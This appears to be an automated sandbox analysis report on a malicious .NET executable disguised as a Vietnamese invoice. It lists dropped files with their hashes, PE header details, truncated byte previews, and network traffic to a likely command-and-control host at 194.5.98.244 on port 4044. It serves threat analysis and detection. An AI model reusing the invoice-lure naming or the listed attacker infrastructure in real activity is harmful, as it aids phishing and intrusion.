                                                                                                                                                                                                                                                                SHA-512:388077841AC30BCBBEBAE034C2D2502FBA7C9EEA7E11698DA10916AFF3DB130761A5E0C3E112CAC6FD79E406FB599C6433652D5819549794AFF4E379159F9E81
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:|..... .......t;.......te3....wg.......................C.....,&...z../&...z{.h.E.........................6..43....wI.............................................................................................\............B.................................................................................................................. .......3....z.........................................................................................................................................................................................................................................<.....{.(...................L.....{O.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7cd0aa12, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):26738688
                                                                                                                                                                                                                                                                Entropy (8bit):0.9501694666317948
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:ZvlcTaxxujQxeJ2lLadAZf7+yVHgZFDb7uBi:RiQxeJCac1
                                                                                                                                                                                                                                                                MD5:211037333A188A888F259473595602F7
                                                                                                                                                                                                                                                                SHA1:C01516099073F36351F64A61CCD120169F37AA0F
                                                                                                                                                                                                                                                                SHA-256:EDCCF5C14BC7577F22DA18972342470F9A6BBE1AA44CE51216B3027F7CFEF65F
                                                                                                                                                                                                                                                                SHA-512:388077841AC30BCBBEBAE034C2D2502FBA7C9EEA7E11698DA10916AFF3DB130761A5E0C3E112CAC6FD79E406FB599C6433652D5819549794AFF4E379159F9E81
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:|..... .......t;.......te3....wg.......................C.....,&...z../&...z{.h.E.........................6..43....wI.............................................................................................\............B.................................................................................................................. .......3....z.........................................................................................................................................................................................................................................<.....{.(...................L.....{O.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7cd0aa12, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):26738688
                                                                                                                                                                                                                                                                Entropy (8bit):0.9501694666317948
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                                MD5:211037333A188A888F259473595602F7
                                                                                                                                                                                                                                                                SHA1:C01516099073F36351F64A61CCD120169F37AA0F
                                                                                                                                                                                                                                                                SHA-256:EDCCF5C14BC7577F22DA18972342470F9A6BBE1AA44CE51216B3027F7CFEF65F
                                                                                                                                                                                                                                                                SHA-512:388077841AC30BCBBEBAE034C2D2502FBA7C9EEA7E11698DA10916AFF3DB130761A5E0C3E112CAC6FD79E406FB599C6433652D5819549794AFF4E379159F9E81
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:|..... .......t;.......te3....wg.......................C.....,&...z../&...z{.h.E.........................6..43....wI.............................................................................................\............B.................................................................................................................. .......3....z.........................................................................................................................................................................................................................................<.....{.(...................L.....{O.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7cd0aa12, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):26738688
                                                                                                                                                                                                                                                                Entropy (8bit):0.9501694666317948
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                                MD5:211037333A188A888F259473595602F7
                                                                                                                                                                                                                                                                SHA1:C01516099073F36351F64A61CCD120169F37AA0F
                                                                                                                                                                                                                                                                SHA-256:EDCCF5C14BC7577F22DA18972342470F9A6BBE1AA44CE51216B3027F7CFEF65F
                                                                                                                                                                                                                                                                SHA-512:388077841AC30BCBBEBAE034C2D2502FBA7C9EEA7E11698DA10916AFF3DB130761A5E0C3E112CAC6FD79E406FB599C6433652D5819549794AFF4E379159F9E81
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:|..... .......t;.......te3....wg.......................C.....,&...z../&...z{.h.E.........................6..43....wI.............................................................................................\............B.................................................................................................................. .......3....z.........................................................................................................................................................................................................................................<.....{.(...................L.....{O.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8704
                                                                                                                                                                                                                                                                Entropy (8bit):4.76941550076102
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                                MD5:0E4816AC89A716B262402CD1791400DF
                                                                                                                                                                                                                                                                SHA1:A9F39BD3330B1F70535C716B51E55442E930B164
                                                                                                                                                                                                                                                                SHA-256:BEA1C74AD8FCB8C06967F98F93275784F5DF8266FF9E6AB06273AE48AFED0F8A
                                                                                                                                                                                                                                                                SHA-512:00080A26CD21CD690DCCA18461E7AE2FA10DA6231EE05CFDFF59F580F0B8AA056AD3A502D98364272B2B7AFB0365A04F188569823772719D0366605EAA125767
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .................0.............Z6... ...@....@.. ....................................`..................................6..O....@..l....................`.......5............................................... ............... ..H............text...`.... ...................... ..`.rsrc...l....@......................@..@.reloc.......`....... ..............@..B................<6......H.......l%..............45..............................................N.(.....(.....(....*..{....r...po.....{....(....o....*..{....(.....{....o....t....o....o....*....0..>........{....o....t....o......o.....{....o......"...%.. .o......(....,*.{.....{....o....t....o........o....o....*.{....o....t....o......o.....{....o......"...%.. .o......(....,*.{.....{....o....t....o........o....o....*.{....o....t....o......o.....{....o......"...%.. .o......(....,).{.....{....o....t....o.
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..
                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8704
                                                                                                                                                                                                                                                                Entropy (8bit):4.8360345624958825
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                                MD5:A07407FCE937593044AD512F4A6D7A1E
                                                                                                                                                                                                                                                                SHA1:6FC304EB3856198C1F8B1DA8C4A3A52C657274C7
                                                                                                                                                                                                                                                                SHA-256:770A25E30C2F095A09570447FD3AB6ECB78DE00185D39035A1B87B1D7DE89F8C
                                                                                                                                                                                                                                                                SHA-512:03CF85C7D12DACCC5896A607A4C8A4BB14D3769792081AE2CF838FFFA14016556C94389828726ECDECDCD35309E64714F8C000C84D31B849B977FEE6A0B184B1
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{................0..............6... ...@....@.. ....................................`..................................6..O....@..t....................`.......6............................................... ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`....... ..............@..B.................6......H.......l%..\............5..............................................N.(.....(.....(....*..{....r...po.....{....(....o....*..{....(.....{....o....t....o....o....*....0..>........{....o....t....o......o.....{....o......"...%.. .o......(....,*.{.....{....o....t....o........o....o....*.{....o....t....o......o.....{....o......"...%.. .o......(....,*.{.....{....o....t....o........o....o....*.{....o....t....o......o.....{....o......"...%.. .o......(....,).{.....{....o....t....o.
                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                Entropy (8bit):4.8360345624958825
                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                                                File name:Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
                                                                                                                                                                                                                                                                File size:8704
                                                                                                                                                                                                                                                                MD5:a07407fce937593044ad512f4a6d7a1e
                                                                                                                                                                                                                                                                SHA1:6fc304eb3856198c1f8b1da8c4a3a52c657274c7
                                                                                                                                                                                                                                                                SHA256:770a25e30c2f095a09570447fd3ab6ecb78de00185d39035a1b87b1d7de89f8c
                                                                                                                                                                                                                                                                SHA512:03cf85c7d12daccc5896a607a4c8a4bb14d3769792081ae2cf838fffa14016556c94389828726ecdecdcd35309e64714f8c000c84d31b849b977fee6a0b184b1
                                                                                                                                                                                                                                                                SSDEEP:96:2aqDtNDC8SkQVnmWJIfbYey8BMpLrgmRdzf5LoGLSQiLBrhQWRkWHFlwHzNt:2Lj1D8w0dUMpLrgmff5jL0LBdYWHHwR
                                                                                                                                                                                                                                                                TLSH:E402F913F3A9C233CA6F8B7B68A663404775B2012953DF1F9CC661EF5D523808A22753
                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{................0..............6... ...@....@.. ....................................`................................
                                                                                                                                                                                                                                                                Icon Hash:00828e8e8686b000
                                                                                                                                                                                                                                                                Entrypoint:0x4036ee
                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                Time Stamp:0xB7B87B95 [Sun Sep 4 00:13:09 2067 UTC]
                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x369c0x4f.text
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x574.rsrc
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x36800x1c.text
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                .text0x20000x16f40x1800False0.494140625data5.342980735893486IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .rsrc0x40000x5740x600False0.400390625data3.939191122181945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .reloc0x60000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                                                                RT_VERSION0x40900x2e4data
                                                                                                                                                                                                                                                                RT_MANIFEST0x43840x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                                mscoree.dll_CorExeMain
                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:53.998722076 CET496994044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.067178965 CET404449699194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.067753077 CET496994044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.081659079 CET496994044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.154901028 CET404449699194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.203406096 CET496994044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.271770000 CET404449699194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.287580967 CET496994044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.406771898 CET404449699194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.406872988 CET496994044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.518484116 CET404449699194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.626835108 CET404449699194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.629175901 CET496994044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.697290897 CET404449699194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.712408066 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.728215933 CET497014044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.750291109 CET496994044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.776252985 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.776626110 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.791661978 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.792160988 CET404449701194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.792279959 CET497014044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.801376104 CET497014044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.860091925 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.869755030 CET404449701194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.906552076 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.922188044 CET497014044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.962141991 CET4970280192.168.2.3178.237.33.50
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.970858097 CET404449700194.5.98.244192.168.2.3
